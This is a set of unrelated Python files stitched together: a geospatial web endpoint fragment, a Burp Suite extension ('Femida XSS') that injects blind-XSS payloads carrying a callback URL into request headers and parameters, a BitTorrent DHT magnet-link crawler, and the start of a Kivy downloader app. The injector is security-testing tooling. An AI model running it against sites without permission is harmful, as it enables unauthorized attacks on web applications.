feat[name] = layer_feature["properties"][column]
else:
for key,value in layer_feature["properties"].iteritems():
feat[key] = value
if options.get("format") == "geojson":
#return geojson
layer_feature["properties"] = feat
feat = layer_feature
if "feature" in get_feature_data:
get_feature_data["feature"] = feat
elif "features" in get_feature_data:
if get_feature_data["features"]:
get_feature_data["features"].append(feat)
else:
get_feature_data["features"] = [feat]
break
except:
traceback.print_exc()
get_feature_data["failed"] = "{} from layers ({}) failed.{}".format(options["action"],layers,traceback.format_exception_only(sys.exc_type,sys.exc_value))
return get_feature_data
def spatial():
# needs gdal 1.10+
try:
features = json.loads(bottle.request.forms.get("features"))
options = bottle.request.forms.get("options")
if options:
options = json.loads(options)
else:
options = {}
cookies = settings.get_session_cookie()
results = []
features = features["features"] or []
index = 0
while index < len(features):
feature = features[index]
index += 1
feature_result = {}
results.append(feature_result)
for key,val in options.iteritems():
if "action" not in val:
val["action"] = key
if val["action"] == "getArea":
feature_result[key] = calculateArea(feature,cookies,val)
else:
feature_result[key] = getFeature(feature,cookies,val)
bottle.response.set_header("Content-Type", "application/json")
#print("{}:return response to client.{}".format(datetime.now(),results))
return {"total_features": len(results), "features": results}
except:
if bottle.response.status < 400 :
bottle.response.status = 400
bottle.response.set_header("Content-Type", "text/plain")
traceback.print_exc()
return traceback.format_exception_only(sys.exc_type,sys.exc_value)
|
blind_xss.py
|
from burp import IBurpExtender, IScannerCheck
from burp import ITab
from burp import IHttpListener
from burp import IInterceptedProxyMessage
from burp import IMessageEditorController
from burp import IContextMenuFactory, IContextMenuInvocation
from javax.swing import (JLabel, JTextField, JOptionPane,
JTabbedPane, JPanel, JButton, JMenu, JMenuItem, JTable, JScrollPane,
JCheckBox, BorderFactory, Box, JFileChooser, ListSelectionModel)
from javax.swing.border import EmptyBorder
from java.awt import (GridBagLayout, Dimension, GridBagConstraints,
Color, FlowLayout, BorderLayout, Insets)
from java.net import URL
from javax import swing
from javax.swing.filechooser import FileNameExtensionFilter
from javax.swing.table import AbstractTableModel, DefaultTableModel
from javax.swing.event import TableModelEvent, TableModelListener
from StringIO import StringIO
import os
import re
import threading
import random
import math
from java.lang import Runnable
from threading import Thread
from java.util import ArrayList, Arrays
import config
class MyTableModelListener(TableModelListener):
def __init__(self, table, burp, data_dict, file):
self.table = table
self.burp = burp
self.data_dict = data_dict
self.file = file
def tableChanged(self, e):
if e.getType() == 1:
data = self.table.getDataVector()
value = data[-1][1]
key = data[-1][0]
if key == '':
return
if key[-1] == '\n':
key = key[:-1]
self.data_dict[key] = value
if e.getType() == 0:
for x in self.table.getDataVector():
key = x[0]
val = x[1]
if key == '':
continue
if key[-1] == '\n':
key = key[:-1]
self.data_dict[key] = val
try:
self.data_dict.pop('')
except Exception:
pass
self.burp.saveToFileAsync(self.file, self.data_dict)
if e.getType() == -1:
return
try:
self.data_dict.pop('')
except Exception:
pass
class PyRunnable(Runnable):
"""This class is used to wrap a python callable object into a Java Runnable that is
suitable to be passed to various Java methods that perform callbacks.
"""
def __init__(self, target, *args, **kwargs):
"""Creates a PyRunnable.
target - The callable object that will be called when this is run.
*args - Variable positional arguments
**wkargs - Variable keywoard arguments.
"""
self.target = target
self.args = args
self.kwargs = kwargs
def run(self):
self.target(*self.args, **self.kwargs)
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IContextMenuFactory, IScannerCheck):
name = "Femida XSS"
_jTabbedPane = JTabbedPane()
_jPanel = JPanel()
_jAboutPanel = JPanel()
_jPanelConstraints = GridBagConstraints()
_jLabelParameters = None
_jTextFieldParameters = None
_jLabelTechniques = None
_jTextFieldURL = None
_jLabelFuzzFactor = None
_jTextFieldFuzzFactor = None
_jLabelAdditionalCmdLine = None
_jTextFieldAdditionalCmdLine = None
_jButtonSetCommandLine = None
_jLabelAbout = None
_overwriteHeader = False
_overwriteParam = False
_forkRequestParam = False
def doActiveScan(self, baseRequestResponse, insertionPoint):
scan_issues = []
try:
requestString = str(baseRequestResponse.getRequest().tostring())
newRequestString = self.prepareRequest(requestString)
vulnerable, verifyingRequestResponse = self.quickCheckScan(newRequestString, baseRequestResponse)
except Exception as msg:
print(msg)
return []
def quickCheckScan(self, preparedRequest, requestResponse):
check = self._callbacks.makeHttpRequest(requestResponse.getHttpService(), self._helpers.stringToBytes(preparedRequest))
vulner = self._helpers.analyzeResponse(check.getResponse()).getStatusCode() == 200
return vulner, check
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self._callbacks.setExtensionName(self.name)
self._callbacks.registerScannerCheck(self)
self._dictPayloads = {}
self._dictHeaders = {}
self._dictParams = {}
self.status_flag = False
self.jfc = JFileChooser("./")
self.jfc.setDialogTitle("Upload Payloads")
self.jfc.setFileFilter(FileNameExtensionFilter("TXT file", ["txt"]))
self._layout = GridBagLayout()
self._jPanel.setLayout(self._layout)
self._jLabelTechniques = JLabel("Press to start:")
self.createAnyView(self._jLabelTechniques, 0, 0, 3, 1, Insets(0, 0, 10, 0))
self.submitSearchButton = swing.JButton('Run proxy', actionPerformed=self.active_flag)
self.submitSearchButton.setBackground(Color.WHITE)
self.createAnyView(self.submitSearchButton, 3, 0, 6, 1, Insets(0, 0, 10, 0))
self._jPanel.setBounds(0, 0, 1000, 1000)
self._jLabelTechniques = JLabel("Your URL (my.burpcollaborator.net):")
self.createAnyView(self._jLabelTechniques, 0, 1, 3, 1, Insets(0, 0, 10, 0))
self._jTextFieldURL = JTextField("", 30)
self.createAnyView(self._jTextFieldURL, 3, 1, 5, 1, Insets(0, 0, 10, 0))
self._forkRequestButton = swing.JButton('Parallel Request',actionPerformed=self.forkRequest)
self._forkRequestButton.setBackground(Color.WHITE)
self.createAnyView(self._forkRequestButton, 8, 1, 1, 1, Insets(0, 0, 10, 0))
self._tableModelPayloads = DefaultTableModel()
self._tableModelPayloads.addColumn("Payload")
self._tableModelPayloads.addColumn("Using")
self._tableModelHeaders = DefaultTableModel()
self._tableModelHeaders.addColumn("Header")
self._tableModelHeaders.addColumn("Using")
self._tableModelParams = DefaultTableModel()
self._tableModelParams.addColumn("Parameter")
self._tableModelParams.addColumn("Using")
self._payloadTable = self.createAnyTable(self._tableModelPayloads, 1, Dimension(300, 200))
self.createAnyView(self._payloadTable, 0, 2, 3, 1, Insets(0, 0, 0, 10))
self._headerTable = self.createAnyTable(self._tableModelHeaders, 2, Dimension(300, 200))
self.createAnyView(self._headerTable, 3, 2, 3, 1, Insets(0, 0, 0, 10))
self._paramTable = self.createAnyTable(self._tableModelParams, 3, Dimension(300, 200))
self.createAnyView(self._paramTable, 6, 2, 3, 1, Insets(0, 0, 0, 0))
deletePayloadButton = swing.JButton('Delete',actionPerformed=self.deleteToPayload)
deletePayloadButton.setBackground(Color.WHITE)
self.createAnyView(deletePayloadButton, 0, 3, 1, 1, Insets(3, 0, 0, 0))
deletePayloadButton = swing.JButton('Upload',actionPerformed=self.uploadToPayload)
deletePayloadButton.setBackground(Color.WHITE)
self.createAnyView(deletePayloadButton, 1, 3, 1, 1, Insets(3, 0, 0, 0))
addPayloadButton = swing.JButton('Add',actionPerformed=self.addToPayload)
addPayloadButton.setBackground(Color.WHITE)
self.createAnyView(addPayloadButton, 2, 3, 1, 1, Insets(3, 0, 0, 10))
deleteHeaderButton = swing.JButton('Delete',actionPerformed=self.deleteToHeader)
deleteHeaderButton.setBackground(Color.WHITE)
self.createAnyView(deleteHeaderButton, 3, 3, 1, 1, Insets(3, 0, 0, 0))
self._overwriteHeaderButton = swing.JButton('Overwrite',actionPerformed=self.overwriteHeader)
self._overwriteHeaderButton.setBackground(Color.WHITE)
self.createAnyView(self._overwriteHeaderButton, 4, 3, 1, 1, Insets(3, 0, 0, 0))
addHeaderButton = swing.JButton('Add',actionPerformed=self.addToHeader)
addHeaderButton.setBackground(Color.WHITE)
self.createAnyView(addHeaderButton, 5, 3, 1, 1, Insets(3, 0, 0, 10))
deleteParamsButton = swing.JButton('Delete',actionPerformed=self.deleteToParams)
deleteParamsButton.setBackground(Color.WHITE)
self.createAnyView(deleteParamsButton, 6, 3, 1, 1, Insets(3, 0, 0, 0))
self._overwriteParamButton = swing.JButton('Overwrite',actionPerformed=self.overwriteParam)
self._overwriteParamButton.setBackground(Color.WHITE)
self.createAnyView(self._overwriteParamButton, 7, 3, 1, 1, Insets(3, 0, 0, 0))
addParamsButton = swing.JButton('Add',actionPerformed=self.addToParams)
addParamsButton.setBackground(Color.WHITE)
self.createAnyView(addParamsButton, 8, 3, 1, 1, Insets(3, 0, 0, 0))
self._resultsTextArea = swing.JTextArea()
resultsOutput = swing.JScrollPane(self._resultsTextArea)
resultsOutput.setMinimumSize(Dimension(800,200))
self.createAnyView(resultsOutput, 0, 4, 9, 1, Insets(10, 0, 0, 0))
self.clearSearchButton = swing.JButton('Clear Search Output',actionPerformed=self.clearOutput)
self.createAnyView(self.clearSearchButton, 3, 6, 3, 1, Insets(3, 0, 0, 0))
self._callbacks.customizeUiComponent(self._jPanel)
self._callbacks.addSuiteTab(self)
self.starterPack()
self._callbacks.registerHttpListener(self)
self._callbacks.registerContextMenuFactory(self)
return
def createAnyTable(self, table_model, table_number, min_size):
_table = JTable(table_model)
_table.setAutoResizeMode(JTable.AUTO_RESIZE_ALL_COLUMNS)
_scrolltable = JScrollPane(_table)
_scrolltable.setMinimumSize(min_size)
return _scrolltable
def insertAnyTable(self, table, data):
def detectTable(table):
name = table.getColumnName(0)
if name == 'Payloads':
return 0
elif name == 'Headers':
return 1
elif name == 'Parameters':
return 2
tableNum = detectTable(table)
new_data = [str(x) for x in data]
table.insertRow(table.getRowCount(), new_data)
return table.getRowCount()
def createAnyView(self, _component, gridx, gridy, gridwidth, gridheight, insets):
self._jPanelConstraints.fill = GridBagConstraints.HORIZONTAL
self._jPanelConstraints.gridx = gridx
self._jPanelConstraints.gridy = gridy
self._jPanelConstraints.gridwidth = gridwidth
self._jPanelConstraints.gridheight = gridheight
self._jPanelConstraints.insets = insets
self._jPanel.add(_component, self._jPanelConstraints)
def createMenuItems(self, contextMenuInvocation):
context = contextMenuInvocation.getInvocationContext()
filterMenu = JMenu("Femida XSS")
self._contextMenuData = contextMenuInvocation
if (context == 0 or context == 1 or
context == 2 or context == 3):
filterMenu.add(JMenuItem("Add to Headers", actionPerformed = self.addToHeadersItem))
filterMenu.add(JMenuItem("Add to Parameters", actionPerformed = self.addToParametersItem))
return Arrays.asList(filterMenu)
def addToHeadersItem(self, event):
start, end = self._contextMenuData.getSelectionBounds()
message = self._contextMenuData.getSelectedMessages()[0]
ctx = self._contextMenuData.getInvocationContext()
if ctx == 0 or ctx == 2:
message = message.getRequest()
elif ctx == 1 or ctx == 3:
message = message.getResponse()
else:
print(ctx)
return
try:
selected_text = self._helpers.bytesToString(message)[start:end]
self.insertAnyTable(self._tableModelHeaders, [str(selected_text), '1'])
except Exception:
pass
def addToParametersItem(self, event):
start, end = self._contextMenuData.getSelectionBounds()
message = self._contextMenuData.getSelectedMessages()[0]
ctx = self._contextMenuData.getInvocationContext()
if ctx == 0 or ctx == 2:
message = message.getRequest()
elif ctx == 1 or ctx == 3:
message = message.getResponse()
else:
print(ctx)
return
try:
selected_text = self._helpers.bytesToString(message)[start:end]
self.insertAnyTable(self._tableModelParams, [str(selected_text), '1'])
except Exception:
pass
def starterPack(self):
self.addFromFileAsync(config.Payloads, self._tableModelPayloads)
self.addFromFileAsync(config.Headers, self._tableModelHeaders)
self.addFromFileAsync(config.Parameters, self._tableModelParams)
self._jTextFieldURL.setText(config.Callback_url)
self._tableModelPayloads.addTableModelListener(MyTableModelListener(self._tableModelPayloads, self, self._dictPayloads, config.Payloads))
self._tableModelHeaders.addTableModelListener(MyTableModelListener(self._tableModelHeaders, self, self._dictHeaders, config.Headers))
self._tableModelParams.addTableModelListener(MyTableModelListener(self._tableModelParams, self, self._dictParams, config.Parameters))
def addToPayload(self, button):
self.insertAnyTable(self._tableModelPayloads, ['', '1'])
def addToHeader(self, button):
self.insertAnyTable(self._tableModelHeaders, ['', '1'])
def addToParams(self, button):
self.insertAnyTable(self._tableModelParams, ['', '1'])
def uploadToPayload(self, button):
self._returnFileChooser = self.jfc.showDialog(None, "Open")
if (self._returnFileChooser == JFileChooser.APPROVE_OPTION):
selectedFile = self.jfc.getSelectedFile()
self.fileUpload(selectedFile, self._tableModelPayloads)
def deleteToPayload(self, button):
try:
val = self._tableModelPayloads.getValueAt(self._tableModelPayloads.getRowCount()-1, 0)
self._tableModelPayloads.removeRow(self._tableModelPayloads.getRowCount()-1)
self._dictPayloads.pop(val)
self.saveToFileAsync(config.Payloads, self._dictPayloads)
except Exception as msg:
# print(msg)
pass
def deleteToHeader(self, button):
try:
val = self._tableModelHeaders.getValueAt(self._tableModelHeaders.getRowCount()-1, 0)
self._tableModelHeaders.removeRow(self._tableModelHeaders.getRowCount()-1)
self._dictHeaders.pop(val)
self.saveToFileAsync(config.Headers, self._dictHeaders)
except Exception as msg:
# print(msg)
pass
def deleteToParams(self, button):
try:
val = self._tableModelParams.getValueAt(self._tableModelParams.getRowCount()-1, 0)
self._tableModelParams.removeRow(self._tableModelParams.getRowCount()-1)
self._dictParams.pop(val)
self.saveToFileAsync(config.Parameters, self._dictParams)
except Exception as msg:
# print(msg)
pass
def clearOutput(self, button):
self._resultsTextArea.setText("")
def fileUpload(self, path, table):
with open(str(path), "r") as f:
for line in f:
self.insertAnyTable(table, [str(line), '1'])
def active_flag(self, button):
if not self.status_flag:
self.status_flag = True
self.submitSearchButton.setBackground(Color.GRAY)
self.appendToResults("Proxy start...\n")
else:
self.status_flag = False
self.submitSearchButton.setBackground(Color.WHITE)
self.appendToResults("Proxy stop...\n")
def overwriteHeader(self, button):
if not self._overwriteHeader:
self._overwriteHeader = True
self._overwriteHeaderButton.setBackground(Color.GRAY)
else:
self._overwriteHeader = False
self._overwriteHeaderButton.setBackground(Color.WHITE)
def overwriteParam(self, button):
if not self._overwriteParam:
self._overwriteParam = True
self._overwriteParamButton.setBackground(Color.GRAY)
else:
self._overwriteParam = False
self._overwriteParamButton.setBackground(Color.WHITE)
def forkRequest(self, button):
if not self._forkRequestParam:
self._forkRequestParam = True
self._forkRequestButton.setBackground(Color.GRAY)
else:
self._forkRequestParam = False
self._forkRequestButton.setBackground(Color.WHITE)
def prepareRequest(self, requestString, messageInfo=None):
requestString = str(requestString)
listHeader = re.findall('([\w-]+):\s?(.*)', requestString)
dictRealHeaders = {x[0].lower():x[1] for x in listHeader}
selectedPayloads = {}
for ind, k in enumerate(self._dictPayloads):
if self._dictPayloads[k] == '1':
selectedPayloads[k] = '1'
else:
continue
for index, key in enumerate(self._dictHeaders):
if key.lower() in dictRealHeaders.keys() and self._dictHeaders[key] == '1':
if len(self._dictPayloads.keys()) == 0:
pass
elif self._overwriteHeader:
payload = random.choice(selectedPayloads.keys())
payload = payload.replace(r"{URL}", self._jTextFieldURL.getText(), 1)
requestString = requestString.replace(dictRealHeaders.get(key.lower()), payload, 1)
elif not self._overwriteHeader:
payload = random.choice(selectedPayloads.keys())
payload = payload.replace(r"{URL}", self._jTextFieldURL.getText(), 1)
payload = dictRealHeaders.get(key.lower()) + payload
requestString = requestString.replace(dictRealHeaders.get(key.lower()), payload, 1)
else:
pass
for index, key in enumerate(self._dictParams):
analyzed = self._helpers.analyzeRequest(requestString.encode())
param = analyzed.getParameters()
dictRealParams = {x.getName().lower(): [x.getValue(), x.getValueStart(), x.getValueEnd()] for x in param}
if key.lower() in dictRealParams.keys() and self._dictParams[key] == '1':
if len(self._dictPayloads.keys()) == 0:
pass
elif self._overwriteParam:
payload = random.choice(selectedPayloads.keys())
payload = payload.replace(r"{URL}", self._jTextFieldURL.getText(), 1)
start_word = dictRealParams[key.lower()][1]
end_word = dictRealParams[key.lower()][2]
requestString = requestString[:start_word] + payload + requestString[end_word:]
elif not self._overwriteParam:
payload = random.choice(selectedPayloads.keys())
payload = payload.replace(r"{URL}", self._jTextFieldURL.getText(), 1)
payload = dictRealParams[key.lower()][0] + payload
start_word = dictRealParams[key.lower()][1]
end_word = dictRealParams[key.lower()][2]
requestString = requestString[:start_word] + payload + requestString[end_word:]
else:
pass
return requestString
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if not self.status_flag:
return
# only process requests
if not messageIsRequest:
return
if self._forkRequestParam:
requestString = messageInfo.getRequest().tostring()
# SOOOO HARD FIX! It should be better
if requestString[0] == '@':
messageInfo.setRequest(self._helpers.stringToBytes(requestString[1:]))
else:
newRequestString = self.prepareRequest(requestString, messageInfo)
self.appendToResults('Parallel Request:')
self.appendToResults(newRequestString.encode())
newRequestString = '@' + newRequestString
func = self._callbacks.makeHttpRequest
thread = Thread(target=func, args=(messageInfo.getHttpService(), self._helpers.stringToBytes(newRequestString)))
thread.start()
else:
requestString = messageInfo.getRequest().tostring()
newRequestString = self.prepareRequest(requestString, messageInfo)
self.appendToResults(newRequestString.encode())
messageInfo.setRequest(self._helpers.stringToBytes(newRequestString))
# Fnction to provide output to GUI
def appendToResults(self, s):
def appendToResults_run(s):
self._resultsTextArea.append(s)
self._resultsTextArea.append('\n')
swing.SwingUtilities.invokeLater(PyRunnable(appendToResults_run, str(s)))
def addFromFileAsync(self, file, table):
def addFromFile_run(file, table):
if os.path.exists(file):
with open(file, 'r') as f:
for row in f.readlines():
if row != '':
temp = row[:-1] if row[-1] == '\n' else row
self.insertAnyTable(table, [str(temp), '1'])
swing.SwingUtilities.invokeLater(PyRunnable(addFromFile_run, file, table))
def saveToFileAsync(self, file, data, isAppend=False):
def saveToFile_run(file, data, isAppend):
isAppend = 'w'
with open(file, isAppend) as f:
for i, k in enumerate(data):
f.write("{}\n".format(k))
f.seek(-1, os.SEEK_END)
f.truncate()
swing.SwingUtilities.invokeLater(PyRunnable(saveToFile_run, file, data, isAppend))
def getTabCaption(self):
return self.name
def getUiComponent(self):
return self._jPanel
|
crawler.py
|
#! usr/bin/python
# encoding=utf-8
import socket
import codecs
import time
from threading import Thread
from collections import deque
from multiprocessing import Process, cpu_count
import bencoder
from .utils import get_logger, get_nodes_info, get_rand_id, get_neighbor
from .database import RedisClient
# 服务器 tracker
BOOTSTRAP_NODES = [
"udp://tracker.open-internet.nl:6969/announce",
"udp://tracker.coppersurfer.tk:6969/announce",
"udp://exodus.desync.com:6969/announce",
"udp://tracker.opentrackr.org:1337/announce",
"udp://tracker.internetwarriors.net:1337/announce",
"udp://9.rarbg.to:2710/announce",
"udp://public.popcorn-tracker.org:6969/announce",
"udp://tracker.vanitycore.co:6969/announce",
"https://1.track.ga:443/announce",
"udp://tracker.tiny-vps.com:6969/announce",
"udp://tracker.cypherpunks.ru:6969/announce",
"udp://thetracker.org:80/announce",
"udp://tracker.torrent.eu.org:451/announce",
"udp://retracker.lanta-net.ru:2710/announce",
"udp://bt.xxx-tracker.com:2710/announce",
"http://retracker.telecom.by:80/announce",
"http://retracker.mgts.by:80/announce",
"http://0d.kebhana.mx:443/announce",
"udp://torr.ws:2710/announce",
"udp://open.stealth.si:80/announce",
("router.bittorrent.com", 6881),
("dht.transmissionbt.com", 6881),
("router.utorrent.com", 6881),
]
# 双端队列容量
MAX_NODE_QSIZE = 10000
# UDP 报文 buffsize
UDP_RECV_BUFFSIZE = 65535
# 服务 host
SERVER_HOST = "0.0.0.0"
# 服务端口
SERVER_PORT = 9090
# 磁力链接前缀
MAGNET_PER = "magnet:?xt=urn:btih:{}"
# while 循环休眠时间
SLEEP_TIME = 1e-5
# 节点 id 长度
PER_NID_LEN = 20
# 执行 bs 定时器间隔(秒)
PER_SEC_BS_TIMER = 8
# 是否使用全部进程
MAX_PROCESSES = cpu_count() // 2 or cpu_count()
class HNode:
def __init__(self, nid, ip=None, port=None):
self.nid = nid
self.ip = ip
self.port = port
class DHTServer:
def __init__(self, bind_ip, bind_port, process_id):
self.bind_ip = bind_ip
self.bind_port = bind_port
self.process_id = process_id
self.nid = get_rand_id()
# nodes 节点是一个双端队列
self.nodes = deque(maxlen=MAX_NODE_QSIZE)
# KRPC 协议是由 bencode 编码组成的一个简单的 RPC 结构,使用 UDP 报文发送。
self.udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# UDP 地址绑定
self.udp.bind((self.bind_ip, self.bind_port))
# redis 客户端
self.rc = RedisClient()
self.logger = get_logger("logger_{}".format(bind_port))
def bootstrap(self):
"""
利用 tracker 服务器,伪装成 DHT 节点,加入 DHT 网络
"""
for address in BOOTSTRAP_NODES:
self.send_find_node(address)
def bs_timer(self):
"""
定时执行 bootstrap()
"""
t = 1
while True:
if t % PER_SEC_BS_TIMER == 0:
t = 1
self.bootstrap()
t += 1
time.sleep(1)
def send_krpc(self, msg, address):
"""
发送 krpc 协议
:param msg: 发送 UDP 报文信息
:param address: 发送地址,(ip, port) 元组
"""
try:
# msg 要经过 bencode 编码
self.udp.sendto(bencoder.bencode(msg), address)
except:
pass
def send_error(self, tid, address):
"""
发送错误回复
"""
msg = dict(t=tid, y="e", e=[202, "Server Error"])
self.send_krpc(msg, address)
def send_find_node(self, address, nid=None):
"""
发送 find_node 请求。
`find_node 请求`
find_node 被用来查找给定 ID 的节点的联系信息。这时 KPRC 协议中的
"q" == "find_node"。find_node 请求包含 2 个参数,第一个参数是 id,
包含了请求节点的 ID。第二个参数是 target,包含了请求者正在查找的
节点的 ID。当一个节点接收到了 find_node 的请求,他应该给出对应的
回复,回复中包含 2 个关键字 id 和 nodes,nodes 是字符串类型,
包含了被请求节点的路由表中最接近目标节点的 K(8) 个最接近的节点的联系信息。
`示例`
参数: {"id" : "<querying nodes id>", "target" : "<id of target node>"}
回复: {"id" : "<queried nodes id>", "nodes" : "<compact node info>"}
:param address: 地址元组(ip, port)
:param nid: 节点 id
"""
nid = get_neighbor(nid) if nid else self.nid
tid = get_rand_id()
msg = dict(
t=tid,
y="q",
q="find_node", # 指定请求为 find_node
a=dict(id=nid, target=get_rand_id()),
)
self.send_krpc(msg, address)
def send_find_node_forever(self):
"""
循环发送 find_node 请求
"""
self.logger.info("send find node forever...")
while True:
try:
# 弹出一个节点
node = self.nodes.popleft()
self.send_find_node((node.ip, node.port), node.nid)
time.sleep(SLEEP_TIME)
except IndexError:
# 一旦节点队列为空,则重新加入 DHT 网络
self.bootstrap()
def save_magnet(self, info_hash):
"""
将磁力链接保存到数据库
:param info_hash: 磁力链接的 info_hash
"""
# 使用 codecs 解码 info_hash
hex_info_hash = codecs.getencoder("hex")(info_hash)[0].decode()
magnet = MAGNET_PER.format(hex_info_hash)
self.rc.add_magnet(magnet)
# self.logger.info("pid " + str(self.process_id) + " - " + magnet)
self.logger.info("pid_{0} - {1}".format(self.process_id, magnet))
def on_message(self, msg, address):
"""
负责返回信息的处理
:param msg: 报文信息
:param address: 报文地址
"""
try:
# `回复`
# 对应于 KPRC 消息字典中的 y 关键字的值是 r,包含了一个附加的关键字 r。
# 关键字 r 是字典类型,包含了返回的值。发送回复消息是在正确解析了请求消息的
# 基础上完成的。
if msg[b"y"] == b"r":
# nodes 是字符串类型,包含了被请求节点的路由表中最接近目标节点
# 的 K个最接近的节点的联系信息。
if msg[b"r"].get(b"nodes", None):
self.on_find_node_response(msg)
# `请求`
# 对应于 KPRC 消息字典中的 y 关键字的值是 q,它包含 2 个附加的关键字
# q 和 a。关键字 q 是字符串类型,包含了请求的方法名字。关键字 a 一个字典
# 类型包含了请求所附加的参数。
# 而实际上我们只需要获取这两者中的 info hash,用于构造磁力链接进而获取种子。
elif msg[b"y"] == b"q":
# get_peers 与 torrent 文件的 info_hash 有关。这时 KPRC 协议中的
# "q" = "get_peers"。get_peers 请求包含 2 个参数。第一个参数是 id,
# 包含了请求节点的 ID。第二个参数是 info_hash,它代表 torrent 文件的 info_hash
if msg[b"q"] == b"get_peers":
self.on_get_peers_request(msg, address)
# announce_peer 表明请求的节点正在某个端口下载 torrent
# 文件。announce_peer 包含 4 个参数。第一个参数是 id,包含了请求节点的 ID;
# 第二个参数是 info_hash,包含了 torrent 文件的 info_hash;第三个参数是 port
# 包含了整型的端口号,表明 peer 在哪个端口下载;第四个参数数是 token,
# 这是在之前的 get_peers 请求中收到的回复中包含的。
elif msg[b"q"] == b"announce_peer":
self.on_announce_peer_request(msg, address)
except KeyError:
pass
def on_find_node_response(self, msg):
"""
解码 nodes 节点信息,并存储在双端队列
:param msg: 节点报文信息
"""
nodes = get_nodes_info(msg[b"r"][b"nodes"])
for node in nodes:
nid, ip, port = node
# 进行节点有效性判断
if len(nid) != PER_NID_LEN or ip == self.bind_ip:
continue
# 将节点加入双端队列
self.nodes.append(HNode(nid, ip, port))
def on_get_peers_request(self, msg, address):
"""
处理 get_peers 请求,获取 info hash
:param msg: 节点报文信息
:param address: 节点地址
"""
tid = msg[b"t"]
try:
info_hash = msg[b"a"][b"info_hash"]
self.save_magnet(info_hash)
except KeyError:
# 没有对应的 info hash,发送错误回复
self.send_error(tid, address)
def on_announce_peer_request(self, msg, address):
"""
处理 get_announce 请求,获取 info hash,address, port
本爬虫目的暂时只是爬取磁链,所以忽略 address, port 有需要的
开发者可自行完善这部分内容
:param msg: 节点报文信息
:param address: 节点地址
"""
tid = msg[b"t"]
try:
info_hash = msg[b"a"][b"info_hash"]
self.save_magnet(info_hash)
except KeyError:
# 没有对应的 info hash,发送错误回复
self.send_error(tid, address)
def receive_response_forever(self):
"""
循环接受 udp 数据
"""
self.logger.info(
"receive response forever {}:{}".format(self.bind_ip, self.bind_port)
)
# 首先加入到 DHT 网络
self.bootstrap()
while True:
try:
# 接受返回报文
data, address = self.udp.recvfrom(UDP_RECV_BUFFSIZE)
# 使用 bdecode 解码返回数据
msg = bencoder.bdecode(data)
# 处理返回信息
self.on_message(msg, address)
time.sleep(SLEEP_TIME)
except Exception as e:
self.logger.warning(e)
def _start_thread(offset):
"""
启动线程
:param offset: 端口偏移值
"""
dht = DHTServer(SERVER_HOST, SERVER_PORT + offset, offset)
threads = [
Thread(target=dht.send_find_node_forever),
Thread(target=dht.receive_response_forever),
Thread(target=dht.bs_timer),
]
for t in threads:
t.start()
for t in threads:
t.join()
def start_server():
"""
多线程启动服务
"""
processes = []
for i in range(MAX_PROCESSES):
processes.append(Process(target=_start_thread, args=(i,)))
for p in processes:
p.start()
for p in processes:
p.join()
|
App.py
|
from Graphics import Config
import datetime as dt
import importlib
import multiprocessing
import os
import platform
import threading
import tkinter as tk
from tkinter import filedialog
from kivy.clock import Clock
from kivy.lang.builder import Builder
from kivy.metrics import dp
from kivy.properties import ColorProperty, ObjectProperty
from kivy.uix.scrollview import ScrollView
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
from kivy.uix.label import Label
from kivy.uix.screenmanager import Screen, ScreenManager
from kivy.uix.textinput import TextInput
from kivy.uix.widget import Widget
from kivymd.app import MDApp
from kivymd.uix.card import MDCard
from kivymd.uix.label import MDLabel
from kivymd.uix.navigationdrawer import MDNavigationDrawer
from kivymd.uix.progressbar import MDProgressBar
from kivymd.uix.textfield import MDTextField
from kivymd.uix.menu import MDDropdownMenu
from kivymd.uix.button import MDIconButton
import Assets.Functions.Parser as p
from Assets.Engine.Engine import TellyEngine
from Assets.Functions.Data import (check_type, copy_data,
create_random_characters, get_standard_size,
paste_data, shorten_int, shorten_string)
from Assets.Functions.Methods import do_nothing
from Assets.Functions.Networks import (check_link_validity,
check_network_connection)
from Assets.Sound.Sound import beep
from Graphics.Buttons import FlatButton
from Graphics.Colors import (get_main_theme_color, get_sub_theme_color,
get_transparent_sub_theme_color)
from Graphics.Intuix.all_downloads_tab import (all_downloading,
all_downloads_bg,
all_downloads_box, all_error,
all_finished, all_label,
all_paused)
from Graphics.Intuix.downloading_tab import (downloading_all, downloading_bg,
downloading_error,
downloading_finished,
downloading_label,
downloading_paused)
from Graphics.Intuix.error_downloads import (error_all, error_bg,
error_downloading, error_finished,
error_label, error_paused)
from Graphics.Intuix.finished_downloads import (finished_all, finished_bg,
finished_downloading,
finished_error, finished_label,
finished_paused)
from Graphics.Intuix.paused_downloads import (paused_all, paused_bg,
paused_downloading, paused_error,
paused_finished, paused_label)
from Graphics.Intuix.Settings import (affirm_settings, cancel_new_settings,
restore_default_settings_query,
save_new_settings_query,
settings_bg_scroll)
from Graphics.Popups import PopupBox, SnackBar
Builder.load_string(
"""
<MainLayout>:
canvas.before:
Color:
rgb: root.theme
Rectangle:
size: self.size"""
)
class MainLayout(BoxLayout):
# important methods are defined for later use throughout the class
# variables
errors = 0
finished = 0
downloads = 0
paused = 0
app_version = Config.app_version
in_service_pids = []
# widgets
manager = ScreenManager()
con_label = Label()
down_label = Label()
download_frame = BoxLayout()
finished_label = Label()
error_label = Label()
paused_label = Label()
settings_holder = BoxLayout()
download_frame_manager = ScreenManager()
all_downloads_tab = Screen()
downloading_tab = Screen()
paused_download_tab = Screen()
error_downloads_tab = Screen()
finished_downloads_tab = Screen()
history_holder = BoxLayout()
# kivy based widgets
drawer = ObjectProperty()
theme = ColorProperty()
navbar = ObjectProperty()
nav_link = ObjectProperty()
home = ObjectProperty()
enter_bt = ObjectProperty()
back_st = ObjectProperty()
back_hst = ObjectProperty()
back_hp = ObjectProperty()
download_pop = ObjectProperty()
url_box = ObjectProperty()
dir_input = ObjectProperty()
def __init__(self, **kwargs):
super(MainLayout, self).__init__(**kwargs)
# the screen manager is added before hand
self.add_widget(self.manager)
# the individual screens are broken down to be added
threading.Thread(self.home_tab_init()).start()
threading.Thread(self.settings_tab_init()).start()
threading.Thread(self.history_tab_init()).start()
threading.Thread(self.help_tab_init()).start()
# a timer is added to update the whole program in intervals of 1/99 seconds
